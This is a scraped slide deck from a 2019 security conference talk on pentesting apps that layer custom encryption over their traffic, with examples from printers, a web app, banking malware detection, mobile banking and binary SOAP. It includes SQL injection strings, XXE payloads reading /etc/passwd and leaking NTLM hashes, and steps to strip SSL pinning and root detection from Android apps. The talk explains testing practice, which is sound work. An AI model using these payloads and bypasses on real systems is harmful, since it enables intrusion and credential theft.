Ce diaporama a bien été signalé.
Nous utilisons votre profil LinkedIn et vos données d’activité pour vous proposer des publicités personnalisées et pertinentes. Vous pouvez changer vos préférences de publicités à tout moment.

We need t go deeper - Testing inception apps.

362 vues

Publié le

When it comes to thick-clients, java applets, embedded devices or mobile apps - often, the idea is to forget about HTTP/S stack, plaintext POST parameters, and instead, implement a custom communication protocol. - Sending files for printing? Caesar cipher does not support full UTF-8, so use AES in ECB mode. - Malware attacking online banking? Even over HTTPS, double-encrypt POST parameters. If your clients are rich, use asymetric encryption, for better protection. - Planning SOAP WS? Use WCF Binary XML and put it in a START-TLS tunnel wrapped over a TCP connection. Welcome to the world of application/x-inception-data content types, <meta charset=obscure> encoding and custom cryptography. Ideas that usually implement methods of 'security by obscurity'. Once the outer layer of obfuscation is off, very often the server backend reveals simple access control issues, SQL query shells or code execution vulnerabilities. I will discuss real-world examples from enterprise solutions tests which require a bit more effort to allow tampering with data send from the client: - intercepting the traffic, bypassing NAC - decapsulating encryption and encoding layers - hooking into function calls, modifying packages - reverse-engineer proprietary protocols and encryption.

Publié dans : Logiciels
  • Soyez le premier à commenter

  • Soyez le premier à aimer ceci

We need t go deeper - Testing inception apps.

  1. 1. We need to go deeper Testing inception apps Jakub Kaluzny CONFidence, June 2019
  2. 2. DevSecOps B64: dXNlcm5hbWUK=YWRtaW4K&c GFzc3dvcmQK=YWJjCg%3d%3d HTTP username=admin&password=abc HTTP DAST scanner in CI/CD pipeline SQLi Is it fixed? Base64_decode(„YWJjCg==’ OR 1=1”)
  3. 3. JAKUB KALUZNY • 10 years in IT & Security • Threat modeling, DevSecOps, penetration tests • Poland, Spain, Australia • banking, fintech, law, airline, entertainment, e-commerce • Speaker at BlackHat, HackInTheBox, ZeroNights Who
  4. 4. What is this all about? HTTP username=admin&password=abc HTTP username=admin&password=abc SSL Wireshark
  5. 5. Protection against what? Sniffing, Man-in-The-Middle SQL Injection, cross-user access control, business logic
  6. 6. What is this all about? dXNlcm5hbWUK=YWRtaW4K&c GFzc3dvcmQK=YWJjCg%3d%3d HTTP username=admin&password=abc HTTP HTTP username=admin&password=abc SSL SSL Local HTTP proxy Custom script Wireshark
  7. 7. Inception apps AES encrypted: c6fa10bd98a6c4e778eac Binary protocol SSL Key exchange during activation Mobile app – obfuscated Emulator and root/jailbreak detection
  8. 8. • Raising the bar: • For attackers? • For testers? • Money: • Scoping a test? • Risk • Attack surface coverage? • Security level? Why?
  9. 9. • Technical examples • Business consequences • And discuss pentesting processes in general What
  10. 10. LET’S GET TO IT
  11. 11. Example 1 Enterprise printers – Pull Printing PRINTERWORKSTATION PRINT SERVER https://www.slideshare.net/wojdwo/hitb-kaluzny-final
  12. 12. In the middle of printers
  13. 13. Printers down under – AES
  14. 14. • JAR on the SD card • Encryption mechanism in the JAR • Hardcoded static symmetric key - AES Hidden gem – SD card
  15. 15. Example 1 – decompiled JAR
  16. 16. • JAR on the SD card • Encryption mechanism in the JAR • Hardcoded static symmetric key - AES • It’s the same everywhere! • No remote firmware update! Example 1
  17. 17. Attack flow Threat actor Crown jewels Sniff the communication Get the SD card Extract the key Apply decryption
  18. 18. In the middle of printers - revisited S E R V E R P R I N T E R constant 263B 96B, “X” B, 128B always different 64 B many identical 16B blocks HELLO HELLO, CERTIFICATE SESSION KEY PostScript, ECB mode
  19. 19. ECB encryption mode for PostScript files Each block encrypted separately ECB is bad https://en.wikipedia.org/wiki/ECB_mode
  20. 20. In the middle of printers - revisited S E R V E R P R I N T E R constant 263B 96B, “X” B, 128B always different 64 B many identical 16B blocks HELLO HELLO, CERTIFICATE SESSION KEY PostScript, ECB mode
  21. 21. Attack flow Threat actor Crown jewels Sniff the communication Communication analysis Decryption script Data extraction Access to plaintext files, no access control
  22. 22. MORE
  23. 23. Web app, AES comms, no key access HTTP Action=buy&Product=137&name=Kaluzny HTTP magic_string=abcdef1234567890… HTTP magic_string=abcdef1234567890… HTTP msg=Hi%20Kaluzny&Price_for_you=1500.50
  24. 24. b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 11b3215b7764e11fbff4c1db3aa73925 e479b31f1313d3c7bf78585f77f3f17d c69bb9650a3bfb6e9137e218c7267da6 a57fcd28cc90574b00374cc42f224dd3 Magic string magic_string=b0dc782f6bd9 acce9bc3e9c8317b05125bb51 d9cbc4bfa56d41d7db1489f9b bcc2cc45f774773e8adde9c41 ecd62c5bc1faafa1d2553661c 8b83012f7e968d511b3215b77 64e11fbff4c1db3aa7325e479 b31f1313d3c7bf78585f77f3f 17dc69bb9650a3bfb6e9137e2 18c7267da6a57fcd28cc9074b 00374cc42f224dd3 magic_string=b0dc782f6bd9 acce9bc3e9c8317bb6e9137e2 18c7267da6a57fcd28cc9074b 00374cc42f224dd3’ OR 1=1
  25. 25. b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 11b3215b7764e11fbff4c1db3aa73925 e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” c69bb9650a3bfb6e9137e218c7267da6 a57fcd28cc90574b00374cc42f224dd3 Magic string, name =Kaluznyaaaaaaaaaaaaaaa… Hi Kaluznyaaaaaaa aaaaaaaaaaaaaa aaaaaaaaaaaaaa aaaaaa, your price is 1500.50
  26. 26. b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 179762d5bba72ce4700aad2a96f5121d „Kaluznyaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” 5e8c96910f00f0c13fd5a402877d01ec „aaaaaaaaaaaaaaa&” a57fcd28cc90574b00374cc42f224dd3 Magic string, name =Kaluznyaaaaaaaaaaaaaaa… Hi Kaluznyaaaaaaa aaaaaaaaaaaaaa aaaaaaaaaaaaaa aaaaaa, your price is 1500.50
  27. 27. b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” 179762d5bba72ce4700aad2a96f5121d „Kaluznyaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” 5e8c96910f00f0c13fd5a402877d01ec „aaaaaaaaaaaaaaa&” a57fcd28cc90574b00374cc42f224dd3 Magic string, name =Kaluznyaaaaaaaaaaaaaaa… Hi aaaaaaaaaaaaaa aKaluznyaaaaaa aaaaaaaaaaa, your price is 1500.50
  28. 28. b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 179762d5bba72ce4700aad2a96f5121d „Kaluznyaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” 5e8c96910f00f0c13fd5a402877d01ec „aaaaaaaaaaaaaaa&” a57fcd28cc90574b00374cc42f224dd3 Magic string, name =Kaluznyaaaaaaaaaaaaaaa…
  29. 29. b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 a3c87d6b3905a779a5f1023bdf04ad2a „aluznyaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” c69bb9650a3bfb6e9137e218c7267da6 „aaaaaaaaaaaaaa&i” a57fcd28cc90574b00374cc42f224dd3 Magic string, name =aluznyaaaaaaaaaaaaaaa…
  30. 30. b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 b1210bb98863ba5cd874014fb19fae70 „luznyaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” 6334547c4ba2df81296b72e38a5309d8 „aaaaaaaaaaaaa&ip” a57fcd28cc90574b00374cc42f224dd3 Magic string, name =luznyaaaaaaaaaaaaaaa…
  31. 31. b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 5abfcd17d58fe4136232bfd7a1533f93 „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” 880c5f38a4cfa7e003fe5f316294fe28 „aaaaa&ip=X.Y.Z.A” a57fcd28cc90574b00374cc42f224dd3 Magic string, name =aaaaaaaaaaaaaaa…
  32. 32. b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 5655d4c01446a7aeb104cf298fe6b613 „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” 1fa9f4fb1104af1afecd980bec3c8536 „&ip=X.Y.Z.A&user” a57fcd28cc90574b00374cc42f224dd3 Magic string, name =aaaaaaaaaaaaaa…
  33. 33. b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 179762d5bba72ce4700aad2a96f5121d „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” c69bb9650a3bfb6e9137e218c7267da6 „X.Y.Z.A&user=adm” a57fcd28cc90574b00374cc42f224dd3 Magic string, name =aaaaaaaaaaaaaaa…
  34. 34. b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 179762d5bba72ce4700aad2a96f5121d „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” c69bb9650a3bfb6e9137e218c7267da6 „X.Y.Z.A&user=adm” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” c69bb9650a3bfb6e9137e218c7267da6 „X.Y.Z.A&user=adm” Encryption Oracle Hi Kaluznyaaaaaaa aaaaaaaaaaaaaa aaaaaaX.Y.Z.A, your price is 1500.50
  35. 35. B0dc782f6bd9acce9bc3e9c8317b0512 „action=buy&item” 5bb51d9cbc4bfa56d41d7db1489f9bbc „=137&price=1500” c2cc45f774773e48adde9c41ecd62c5b „.50&name=Kaluzn” c1faafa1d2553661c8b83012f7e968d5 „y&ip=X.Y.Z.A&us” 179762d5bba72ce4700aad2a96f5121d „er=admin&passwo” e479b31f1313d3c7bf78585f77f3f17d „rd=s3cr3t&path=” Encryption Oracle 031531894944dd25e457746a02f7eacf „&arbitrary=asd&&” 820cb29708da08d81cd8dd2ee1c459ed „chg=a&....&chg=b”
  36. 36. Web app, AES comms, no key access HTTP Action=buy&Product=137&name=Kaluzny HTTP magic_string=abcdef1234567890… HTTP magic_string=abcdef1234567890… HTTP msg=Hi%20Kaluzny&Price_for_you=1500.50 API
  37. 37. Attack flow Threat actor Crown jewels Tamper with parameters Communication analysis Encryption oracle Lateral movement Credentials would never be sent unencrypted
  38. 38. MITB MALWARE DETECTION IN JAVASCRIPT
  39. 39. MiTB malware - WebInjects <title>Bank</title> … Password: <input type=text> <script src=//malware> <title>Bank</title> … Password: <input type=text>
  40. 40. MiTB malware detection in JS <script src=//antimalware> <script src=//malware> <title>Bank</title> …
  41. 41. JS-based MiTB malware detection MiTB malware detection in JavaScript eval Obfuscation – base64, hex RSA encryption signatures reasoning engine Web Service rsa public key https://www.slideshare.net/wojdwo/bypassing-malware-detection-mechanisms-in-online-banking-confidence @molejarka, @j_kaluzny
  42. 42. Attack flow Threat actor Crown jewels Tamper with parameters Deobfuscate JS Extract RSA keys Decrypt communication
  43. 43. MiTB malware detection in JS <script src=//antimalware> <script src=//malware> <title>Bank</title> …
  44. 44. TESTING MOBILE BANKING IN 2019
  45. 45. Mobile banking in early 2010s OK Hi, I want to send $5 Standard SSL
  46. 46. Attack flow – Android – inception level 1 Threat actor Crown jewels Tamper with parameters Add local proxy CA
  47. 47. • Export CA from local proxy • Push it to the device • Intercept traffic Androd – inception level 1
  48. 48. Mobile banking in early 2010s OK Hi, I want to send $5 SSL pinning
  49. 49. Modifying a hardcoded certificate: • Unpack APK • Change certificate in resources • Pack the app, sign it Attack flow – inception level 2
  50. 50. Attack flow – inception level 2 Threat actor Crown jewels Tamper with parameters Bypass hardcoded SSL pinning checks Set the proxy
  51. 51. • Decompile APK to Smali code • „Void” the pinning methods or change the certificate: • Find the interesting methods • Delete the code, leaving „return-void” at the end • Build it, sign it Attack flow – inception level 2
  52. 52. Testing mobile banking in late 2010s, Poland 1c45a9eef01775077dac93add52595 OK, let’s set a key for future encryption Hi, I want to pair a mobile app e81129f01a5072bad84aaaf8bcc51436 SSL pinning HTTP body encryption
  53. 53. HTTP body encryption payload=e47bf2dcd90af0d3366f 4bacfe932ffae47bf2dcd90af0d33 SSL HTTP
  54. 54. Testing mobile banking in late 2010s, Poland 1c45a9eef01775077dac93add52595 OK, let’s set a key for future encryption Hi, I want to pair a mobile app e81129f01a5072bad84aaaf8bcc51436 SSL pinning Encrypted storage APK/IPA integrity Emulator detection Root/jb detection HTTP body encryption
  55. 55. Attack flow – Android – 7 layers of inception Threat actor Crown jewels Tamper with parameters Bypass integrity checks Bypass root detection Make encryption static Bypass SSL pinning Bypass emulator detection Develop Burp plugin
  56. 56. • Decompile APK to Smali code • „Void” the integrity checks Attack flow – Android – inception level 1/7
  57. 57. • Decompile APK to Smali code • „Void” the integrity checks • „Void” the root checks • Second root check runs a minute after the first! Attack flow – Android – inception level 2/7
  58. 58. • Decompile APK to Smali code • „Void” the integrity checks • „Void” the root checks • „Void” the emulator detection Attack flow – Android – inception level 3/7
  59. 59. • Decompile APK to Smali code • „Void” the integrity checks • „Void” the root checks • „Void” the emulator detection • Bypass SSL pinning Attack flow – Android – inception level 4/7
  60. 60. • Decompile APK to Smali code • „Void” the integrity checks • „Void” the root checks • „Void” the emulator detection • Bypass SSL pinning • Make encryption key „static” Attack flow – Android – inception level 5/7
  61. 61. Example 4 – mobile banking in 2019, Poland 1c45a9eef01775077dac93add52595 OK, let’s set a key for future encryption Hi, I want to pair a mobile app e81129f01a5072bad84aaaf8bcc51436 SSL pinning Encrypted storage APK/IPA integrity Emulator detection Root/jb detection HTTP body encryption
  62. 62. Example 4 – mobile banking in 2019, Poland 1c45a9eef01775077dac93add52595 The key will be 0000000000 Hi, I want to pair a mobile app e81129f01a5072bad84aaaf8bcc51436 SSL pinning Encrypted storage APK/IPA integrity Emulator detection Root/jb detection HTTP body encryption
  63. 63. • Decompile APK to Smali code • „Void” the integrity checks • „Void” the root checks • „Void” the emulator detection • Bypass SSL pinning • Make encryption key „static” • Develop a custom Burp plugin Attack flow – Android – inception level 6/7
  64. 64. Burp plugin – „Deszyfrator” @slawekja
  65. 65. Attack flow – Android – inception level 7/7 Threat actor Crown jewels Tamper with parameters Bypass integrity checks Bypass root detection Make encryption static Bypass SSL pinning Bypass emulator detection Develop Burp plugin You are in position to start testing
  66. 66. SOAP – Simple Object Access Protocol WCF BINARY XML - SOAP TCP START-TLS Let’s call it tnSOAP – totally not SOAP
  67. 67. mitm_relay for START-TLS [thick client] ----▶ [mitm_relay] ----▶ [destination server] | ▲ ▼ | [local proxy] < Intercept and | ▲ modify traffic here ▼ | [dummy webserver] https://github.com/jrmdev/mitm_relay
  68. 68. WCF data – python-wcfbin by ERNW [jk@omega python-wcfbin-develop]$ python xml2wcf.py | hexdump -Cv <?xml version="1.0"?> <soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:m="http://www.example.org"> <soap:Header> </soap:Header> <soap:Body> <m:GetStockPrice> <m:StockName>GOOG</m:StockName> </m:GetStockPrice> </soap:Body> </soap:Envelope> 00000000 43 04 73 6f 61 70 02 0b 04 73 6f 61 70 04 09 01 |C.soap...soap...| 00000010 6d 16 68 74 74 70 3a 2f 2f 77 77 77 2e 65 78 61 |m.http://www.exa| 00000020 6d 70 6c 65 2e 6f 72 67 43 04 73 6f 61 70 08 01 |mple.orgC.soap..| 00000030 43 04 73 6f 61 70 0e 6a 0d 47 65 74 53 74 6f 63 |C.soap.j.GetStoc| 00000040 6b 50 72 69 63 65 6a 09 53 74 6f 63 6b 4e 61 6d |kPricej.StockNam| 00000050 65 9f 03 18 e3 86 01 01 01 |e........| 00000059
  69. 69. Attack flow – tnSOAP Threat actor Crown jewels Tamper with parameters Intercept TCP connection MiTM on START-TLS Decapsulate WCF Hardware + socat mitm_relay python-wcfbin + few fixes
  70. 70. • <!ENTITY xxe SYSTEM „file:///etc/passwd”> • XXE OOB over FTP • <!ENTITY „abc” SYSTEM „file://securing.biz:445/”> TCP -> START TLS -> WCF -> XML -> XXE -> NTLM https://techblog.mediaservice.net/2018/02/from-xml-external-entity-to-ntlm-domain-hashes/
  71. 71. Attack flow – tnSOAP Threat actor Increased attack surface Tamper with parameters Intercept TCP connection MiTM on START-TLS Decapsulate WCF Hardware + socat mitm_relay python-wcfbin + few fixes
  72. 72. • Not a surprise that there are vulnerabilties • Let’s talk about corporate processes: • How penetration tests are organised? • During which phase you realise it’s an inception app? • What is the cost of implementing inception? • What is the security advantage of inception? • What is the cost of testing an inception app? • How to optimise it? Processes
  73. 73. Attack flow – Android – inception level 7/7 Threat actor Crown jewels Tamper with parameters Bypass integrity checks Bypass root detection Make encryption static Bypass SSL pinning Bypass emulator detection Develop Burp plugin You are in position to start testing
  74. 74. • Not a surprise that there are vulnerabilties • Let’s talk about corporate processes: • How penetration tests are organised? • During which phase you realise it’s an inception app? • What is the cost of implementing inception? • What is the security advantage of inception? • What is the cost of testing an inception app? • How to optimise it? Summary
  75. 75. Protection against what? Sniffing, Man-in-The-Middle, Malware SQL Injection, cross-user access control, business logic
  76. 76. • Not a surprise that there are vulnerabilties • Let’s talk about corporate processes: • How penetration tests are organised? • During which phase you realise it’s an inception app? • What is the cost of implementing inception? • What is the security advantage of inception? • What is the cost of testing an inception app? • How to optimise it? Summary
  77. 77. Thank you! Twitter: @j_kaluzny Jakub.Kaluzny@securing.biz MORE THAN SECURITY TESTS.

×